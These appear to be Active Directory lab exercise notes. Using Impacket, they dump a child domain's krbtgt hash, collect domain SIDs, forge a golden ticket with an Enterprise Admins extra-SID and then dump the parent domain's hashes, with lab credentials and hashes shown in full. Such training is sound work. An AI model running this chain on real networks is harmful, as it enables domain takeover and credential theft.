# dump child ntds and get krbtgt NT hash
secretsdump.py -just-dc-user north/krbtgt \
north.newyork.local/fernando.alonzo:'IDr1R3allyF@sTF1!'@192.168.56.11
...
krbtgt:502:aa3b435b51404eeaad3b435b51404ee:13354bc6e1b48fff8d66a2090e909b27:::
..
# dump child domain SID
lookupsid.py -domain-sids north.newyork.local/fernando.alonzo:'IDr1R3allyF@sTF1!'@192.168.56.11 0
[*] Brute forcing SIDs at 192.168.56.11
[*] StringBinding ncacn_np:192.168.56.11[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-3634065772-4036021599-3644360361
# dump parent domain SID
lookupsid.py -domain-sids north.newyork.local/fernando.alonzo:'IDr1R3allyF@sTF1!'@192.168.56.10 0
[*] Brute forcing SIDs at 192.168.56.10
[*] StringBinding ncacn_np:192.168.56.10[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-620482180-1620433373-1814187987
ticketer.py -nthash 13354bc6e1b48fff8d66a2090e909b27\ #krbtgt Hash
-domain-sid S-1-5-21-3634065772-4036021599-3644360361 \ #north.newyork.local SID
-domain north.newyork.local \
-extra-sid S-1-5-21-620482180-1620433373-1814187987-519 \ #newyork.local SID + Extra-SID
goldenuser
The task for you is to add the ccname and do a -no-pass like we have done before :)
export KRB5CCNAME=/home/jefe/delegation/goldenuser.ccache
secretsdump -k -no-pass -just-dc-ntlm \
north.newyork.local/goldenuser@nyc.newyork.local